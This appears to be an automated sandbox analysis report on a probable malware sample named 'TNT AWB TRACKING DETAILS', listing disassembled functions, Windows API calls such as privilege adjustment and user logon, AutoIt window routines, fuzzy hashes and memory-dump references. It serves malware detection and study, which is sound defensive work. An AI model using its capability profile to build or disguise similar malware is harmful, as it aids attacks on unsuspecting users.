Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 57ad310a9c4836620b422f9bdfbeaa7bec4f469c22d1418140fd5fdd69487575
Instruction ID: 452a1e856a895cf908d71d852a5618eb18dd0fc8c46770ef843f7228cd35e309
Opcode Fuzzy Hash: 57ad310a9c4836620b422f9bdfbeaa7bec4f469c22d1418140fd5fdd69487575
Instruction Fuzzy Hash: 18F0823550522DBBDB219FA4CC48FEA776CFF09761F0045A6F909D7181DB309940CBA1

Function 00AF81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8309), ref: 00AF81E0
CloseHandle.KERNEL32(?,?,00AF8309), ref: 00AF81F2

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 6ee7ab5703c560ce2d35813e927a9d194e7734e3cc1fc5260f64cd4f98c5b39d
Instruction ID: 378b72d7179dac6412dd3b8fad675520b24845a1b44deb7b5e5560dfe691604e
Opcode Fuzzy Hash: 6ee7ab5703c560ce2d35813e927a9d194e7734e3cc1fc5260f64cd4f98c5b39d
Instruction Fuzzy Hash: FDE0EC72011611EFE7252B60EC09E77BBFAEF04310B15893DF9A6C5470DB62AC91DB14

Function 00ACA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AC8D57,?,?,?,00000001), ref: 00ACA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00ACA163

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 40910b223dd2323996a2f35af4248b36187bf9327b4e73c5f7ae04c109db0516
Instruction ID: 4474e3e82796cc78bea31e764e68234c2189cff7cab07738f4d3066313ef9d62
Opcode Fuzzy Hash: 40910b223dd2323996a2f35af4248b36187bf9327b4e73c5f7ae04c109db0516
Instruction Fuzzy Hash: B7B0923105420AEBCA106B91EC09BA83F78EB44AA2F404030F60D86060CF6254528A99

Function 00ACF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b503819cd5da2603d66ad609f812779cf1ef38989e1f587fc5d648657dfa16
Instruction ID: 3a8da9c418eb90582db447b8c83edecc65569135ca64078c4dc8a556ff31a506
Opcode Fuzzy Hash: 25b503819cd5da2603d66ad609f812779cf1ef38989e1f587fc5d648657dfa16
Instruction Fuzzy Hash: 4C321561D69F454DDB239634C83233AA259AFB73C4F25D73BE829B69A5EF28C4834100

Function 00AD242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63bbfeef18364624017ae41fce2c7a2898e9ab76d40608df38f0173d3df5576
Instruction ID: 26207125abc99d52ec015fe7b45c10e5782e53839c490eec49c26d08d8984bcc
Opcode Fuzzy Hash: d63bbfeef18364624017ae41fce2c7a2898e9ab76d40608df38f0173d3df5576
Instruction Fuzzy Hash: B6B1F321D2AF414DD3239639883133AB65CAFBB2C5F61D71BFC6775E62EB2185834241

Function 00B08889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00B0889B

Part of subcall function 00AC520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B08F6E,00000000,?,?,?,?,00B0911F,00000000,?), ref: 00AC5213
Part of subcall function 00AC520A: __aulldiv.LIBCMT ref: 00AC5233

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: ec67399995dd6b4d5776811ab50175e30a4e4d8fa7a4685315f33573629f15d0
Instruction ID: ab97c4fbdfac36d0d449ab6571e3f80ba449389200a752128de20ad9178f6cd8
Opcode Fuzzy Hash: ec67399995dd6b4d5776811ab50175e30a4e4d8fa7a4685315f33573629f15d0
Instruction Fuzzy Hash: 8B21B4326356108BC729CF25D841A52B7E1EFA5311B688E6CD1F6CB2D0CE74B905CB94

Function 00B04C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B04C4A

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 16a42d53bcf9eab67bae6c2da93bf73f4305bf82483848cd68656406318e435c
Instruction ID: 859df47ce3b4c3c5f1fc807d2b43ae5a2b64f8504944126ccd8ff6e19c262fc3
Opcode Fuzzy Hash: 16a42d53bcf9eab67bae6c2da93bf73f4305bf82483848cd68656406318e435c
Instruction Fuzzy Hash: F5D05ED516920A38FC3C07209E0FF7A19C8F380782FD085C973018A0C1EE849C405030

Function 00AF87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AF8389), ref: 00AF87D1

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: bc7bfd651adc2666e6d617314b10724288dfe3552a03bf2ba49b75414d582741
Instruction ID: 1a49a1affef8b40099f36160c720e83c957f38a4275a7c070a2c6635103a0ee2
Opcode Fuzzy Hash: bc7bfd651adc2666e6d617314b10724288dfe3552a03bf2ba49b75414d582741
Instruction Fuzzy Hash: 8FD05E3226050EABEF018EA4DD01EBF3B69EB04B01F408121FE15D60A1C775D835AB60

Function 00ACA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00ACA12A

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 780e662befd7809acdabf388aa2d7057a65fa59817722dee7dc90da89110370b
Instruction ID: 378a82cade6a0532b3617b5a30313cdb83e2322770c2fb91f478cdb2c2821fe6
Opcode Fuzzy Hash: 780e662befd7809acdabf388aa2d7057a65fa59817722dee7dc90da89110370b
Instruction Fuzzy Hash: 91A0123000010DE78A001B41EC044547F6CD6001907004030F40C410218B3254114584

Function 00AB8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d63483414d081e59d6546cd2b375e42e89baec83a549abafda086df601fe99
Instruction ID: 3c7cadd1a2e3f6b2e0a8be9cb2bf56a532fba53e2cfb6ba512fd9efb3bef63bb
Opcode Fuzzy Hash: e6d63483414d081e59d6546cd2b375e42e89baec83a549abafda086df601fe99
Instruction Fuzzy Hash: D1222530A0450ACBDF388BACC4947FD77BDFB01384F29816AE6568B593DB78AD91C641

Function 00AC21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 4fa625a34e1541ea604946c4a5567fbe16b0c061d007e41e0d54e0238185a5f8
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 62C162362051930AEB2E47398434B3EBAE19EA27B131B076DD4B3CB1D5EE24C975D760

Function 00AC25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 41f542feb562cc48d2f8537d649e7972014879c8904b7528a8db2dfa6a07de4d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 61C172322051930AEF2E47398474B3EBAE19EA37B131B076DD4B3DB1D5EE20C9659760

Function 00AC1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 74bf0d04868e4aa95127c04492bc1e7f7642aab284a5392255c456db9c7adfd7
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 26C1643230919309EF2E47398474A3EBAE19EA37B131B075DD4B3DB1D6EE20C9759650

Function 03963690 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 8744e06c9e78c5e99a105ec0f146da7042dfea73f2664ceb603c3ecffd9081a5
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: E941A2B1D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB50

Function 03963580 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 96159c6c1bbbebeb4a48d2fdf6d89c1eacd23edc3c2a47c5a46d2b8f5dc1440c
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 7E019278A15209EFCB45DF98C5909AEF7B9FB88310F248599D809A7311D730AE51DB80

Function 03963520 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: a6db163da142ce2739b6ed85280418947dda72918e9820ef2e32461be220a960
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 7C019278A05209EFCB49DF98C5909AEF7B9FB48310F208599D809A7311D730EE41DB80

Function 03961EA0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00B17806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B1785B
DeleteObject.GDI32(00000000), ref: 00B1786D
DestroyWindow.USER32 ref: 00B1787B
GetDesktopWindow.USER32 ref: 00B17895
GetWindowRect.USER32(00000000), ref: 00B1789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B179DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B179ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17A35
GetClientRect.USER32(00000000,?), ref: 00B17A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B17A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17ABB
GlobalLock.KERNEL32(00000000), ref: 00B17AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17AD3
GlobalUnlock.KERNEL32(00000000), ref: 00B17ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17AE3
GlobalFree.KERNEL32(00000000), ref: 00B17AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B32CAC,00000000), ref: 00B17B16
GlobalFree.KERNEL32(00000000), ref: 00B17B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B17B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B17B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17D7A

Strings

DISPLAY, xrefs: 00B17BDD
, xrefs: 00B17D00
static, xrefs: 00B17A75, 00B17BCC
AutoIt v3, xrefs: 00B17A2D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 91cc916d3078b78df6a208387e2764f576dd195dab1379932bca887b192d9444
Instruction ID: a02826b72707c20cb9756391813b1d74142b86f7921c28e307ea88e2fc8b5f38
Opcode Fuzzy Hash: 91cc916d3078b78df6a208387e2764f576dd195dab1379932bca887b192d9444
Instruction Fuzzy Hash: AA027C71900115EFDB24DFA4DD89EAF7BB9EF49310F5081A8F915AB2A0CB74AD41CB60

Function 00B2356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00B2F910), ref: 00B23627
IsWindowVisible.USER32(?), ref: 00B2364B

Strings

GETLINECOUNT, xrefs: 00B238C6
SENDCOMMANDID, xrefs: 00B239DA
SHOWDROPDOWN, xrefs: 00B236E0
GETCURRENTSELECTION, xrefs: 00B237E3
ISVISIBLE, xrefs: 00B23637
ISENABLED, xrefs: 00B2366B
CURRENTTAB, xrefs: 00B236BD
TABLEFT, xrefs: 00B23687
TABRIGHT, xrefs: 00B2369D
SELECTSTRING, xrefs: 00B23806
SETCURRENTSELECTION, xrefs: 00B237B6
GETCURRENTCOL, xrefs: 00B23928
EDITPASTE, xrefs: 00B2395F
HIDEDROPDOWN, xrefs: 00B23700
CHECK, xrefs: 00B2386D
GETSELECTED, xrefs: 00B238A3
UNCHECK, xrefs: 00B23883
GETCURRENTLINE, xrefs: 00B238ED
ADDSTRING, xrefs: 00B23716
ISCHECKED, xrefs: 00B23839
FINDSTRING, xrefs: 00B23776
GETLINE, xrefs: 00B2399B
DELSTRING, xrefs: 00B23749

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 2ae5b23d665b042e21d34fca75cd33977a92fd785e18754f027f7e67bc8483f6
Instruction ID: 7cc7bc214570f80ea4ec7a4ad21e8ff76c43b469e4bf48228cd53b48ee1f95f0
Opcode Fuzzy Hash: 2ae5b23d665b042e21d34fca75cd33977a92fd785e18754f027f7e67bc8483f6
Instruction Fuzzy Hash: 01D18E31208311DBCB04EF10D591F6E77E5EF95780F0544A8F89A5B3A2DB29EE4ACB41

Function 00B2A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B2A630
GetSysColorBrush.USER32(0000000F), ref: 00B2A661
GetSysColor.USER32(0000000F), ref: 00B2A66D
SetBkColor.GDI32(?,000000FF), ref: 00B2A687
SelectObject.GDI32(?,00000000), ref: 00B2A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00B2A6C1
GetSysColor.USER32(00000010), ref: 00B2A6C9
CreateSolidBrush.GDI32(00000000), ref: 00B2A6D0
FrameRect.USER32(?,?,00000000), ref: 00B2A6DF
DeleteObject.GDI32(00000000), ref: 00B2A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00B2A731
FillRect.USER32(?,?,00000000), ref: 00B2A763
GetWindowLongW.USER32(?,000000F0), ref: 00B2A78E

Part of subcall function 00B2A8CA: GetSysColor.USER32(00000012), ref: 00B2A903
Part of subcall function 00B2A8CA: SetTextColor.GDI32(?,?), ref: 00B2A907
Part of subcall function 00B2A8CA: GetSysColorBrush.USER32(0000000F), ref: 00B2A91D
Part of subcall function 00B2A8CA: GetSysColor.USER32(0000000F), ref: 00B2A928
Part of subcall function 00B2A8CA: GetSysColor.USER32(00000011), ref: 00B2A945
Part of subcall function 00B2A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2A953
